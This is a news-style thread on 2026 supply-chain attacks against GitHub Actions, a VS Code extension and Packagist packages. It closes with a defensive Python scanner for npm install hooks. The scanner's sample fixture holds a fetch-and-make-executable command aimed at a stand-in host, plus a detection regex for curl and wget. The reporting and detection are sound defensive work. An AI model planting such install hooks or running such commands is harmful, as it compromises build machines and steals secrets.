Supply-chain attacks hit GitHub repos
- Multiple supply-chain campaigns rapidly compromised developer tools and repositories overnight, inserting backdoors and credential-stealing payloads into widely used CI and editor workflows.
- TeamPCP exploited an Aqua Security Trivy workflow, and a poisoned VS Code extension exfiltrated roughly 3,800–4,000 GitHub repositories; Megalodon injected backdoors into over 5,500 repositories in hours.
- Security firms say CI/CD must be treated as production infrastructure and advise pinning actions and protecting secrets to limit spread. (techtimes.com) (infostealers.com) (memeburn.com) (thehackernews.com)
1/ A cluster of software supply-chain attacks has landed in the same place developers trust most: their build pipelines, package workflows and editor extensions. In the past week, GitHub confirmed unauthorized access to internal repositories after a poisoned VS Code extension hit an employee device, while separate campaigns pushed malicious GitHub Actions and package-install payloads into thousands of repositories. (github.blog)

2/ The GitHub incident was tied to a malicious version of the Nx Console VS Code extension. GitHub said on May 20 that the activity involved GitHub-internal repositories only, and that the attacker’s claim of about 3,800 repositories was “directionally consistent” with its investigation. GitHub also said it had no evidence of impact to customer repositories outside its internal systems. (github.blog)

3/ That matters because this was not a breach of GitHub’s core hosting platform in the usual sense. GitHub said it began with a compromised employee device and a third-party extension, which is a reminder that developer endpoints and tooling now sit directly on the attack path. (github.blog)

4/ The attack chain behind that breach traces back to TeamPCP, a threat actor that had already compromised Aqua Security’s Trivy ecosystem in March. Aqua’s advisory said that on March 19, 2026, an attacker used compromised credentials to publish a malicious Trivy release, force-push 76 of 77 `trivy-action` version tags, and replace all seven `setup-trivy` tags with malicious commits. (github.com)

5/ The Trivy compromise is important for one reason above all: many teams referenced those GitHub Actions by mutable tags instead of immutable commit SHAs. Aqua, Microsoft and NHS guidance all said users who pinned by tag rather than full commit SHA needed to review workflow runs during the March 19-20 exposure window. (github.com)

6/ In plain terms, a security scanner became a delivery mechanism. Microsoft said the Trivy incident “weaponiz[ed] trusted security tooling” against the organizations using it, after attackers leveraged access from a prior incident that was not fully remediated. (microsoft.com)

7/ The second big thread is scale. StepSecurity said a separate campaign, tracked as Megalodon, injected malicious GitHub Actions workflows into more than 5,500 public repositories on May 18 within a roughly six-hour window. The Hacker News, citing SafeDep, reported 5,718 commits across 5,561 repositories between 11:36 a.m. and 5:48 p.m. UTC. (stepsecurity.io)

8/ Megalodon’s payload was built to strip CI/CD environments for anything useful. Reported targets included cloud credentials, GitHub and GitLab tokens, SSH keys, Docker and Kubernetes configs, Vault and Terraform material, `.env` files and service-account files. That is why these incidents are being treated as infrastructure attacks, not just code-tampering events. (thehackernews.com)

9/ A third campaign widened the pattern beyond GitHub Actions. Socket found a malicious post-install hook across more than 700 GitHub repositories, including eight compromised Packagist packages, and said the malicious code was inserted into `package.json` rather than `composer.json`, targeting projects that ship JavaScript assets alongside PHP code. (socket.dev)

10/ That detail is easy to miss but operationally important. Teams that scan PHP dependency manifests may not inspect JavaScript install scripts buried inside the same project tree, which gave the attackers a cross-ecosystem route into build machines and CI runners. Socket and follow-up reporting said the hook downloaded and executed a Linux binary from a GitHub Releases URL during installs and workflows. (thehackernews.com)

11/ Across all three stories, the common failure is trust in automation without hard boundaries. A tagged action was assumed to stay the same. An editor extension was assumed to be safe because it came from a familiar workflow. A package install script was assumed to be routine build glue. The attackers used those assumptions as the entry point. (github.com)

12/ The practical response from defenders has been consistent. Aqua’s advisory points users to patched versions and exposure windows; GitHub says it has rotated critical secrets and continues monitoring; security researchers tracking Megalodon and the Packagist activity are urging teams to pin actions to immutable SHAs, reduce token scope, review CI secrets, and treat runners as production systems with logging and containment. (github.com)

13/ The broader lesson is not that open source suddenly became unsafe. It is that CI/CD, package managers and developer tooling now carry production-grade privileges, and attackers know it. The next updates to watch are GitHub’s incident posts, Aqua’s Trivy advisory, and ongoing research from firms tracking Megalodon and the Packagist campaign. (github.blog)
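The blind spot in items 9 and 10, install hooks in a `package.json` that sits beside a `composer.json`, can be surfaced with a tree walk. This is an added example, not Socket's tooling: it lists every npm install-time lifecycle script, marks those that fetch from the network, and notes whether the manifest lives in a PHP project. The fetch heuristic, the sample tree and its names, commands and URL are assumptions made for illustration.

```python
import json
import os
import re
import tempfile

# Hooks npm runs on a plain `npm install`, plus a heuristic (assumption) for fetch-and-run.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
FETCH_RE = re.compile(r"\b(?:curl|wget)\b|https?://|chmod\s+\+x")

def find_install_hooks(root):
    """Return (manifest, hook, command, fetches, beside_composer) per install hook."""
    results = []
    for dirpath, dirnames, filenames in os.walk(root):
        # vendor/ is walked on purpose so Composer-installed packages are inspected too.
        dirnames[:] = sorted(d for d in dirnames if d not in ("node_modules", ".git"))
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest
        scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
        if not isinstance(scripts, dict):
            continue
        for hook in INSTALL_HOOKS:
            cmd = scripts.get(hook)
            if isinstance(cmd, str):
                results.append((os.path.relpath(path, root), hook, cmd,
                                bool(FETCH_RE.search(cmd)), "composer.json" in filenames))
    return results

def build_sample(root):
    """Write a constructed two-project tree; names, commands and URL are made up."""
    fetch = "curl -sSL https://example.invalid/helper -o helper && chmod +x helper"
    files = {
        "php-lib/composer.json": {"name": "example/php-lib"},
        "php-lib/package.json": {"scripts": {"postinstall": fetch}},
        "js-app/package.json": {"scripts": {"prepare": "husky", "build": "vite build"}},
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            json.dump(content, fh)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*find_install_hooks(tmp), sep="\n")
```

Rows where both flags are true are the ones to review first; installing with `npm ci --ignore-scripts` on CI runners keeps such hooks from executing at all.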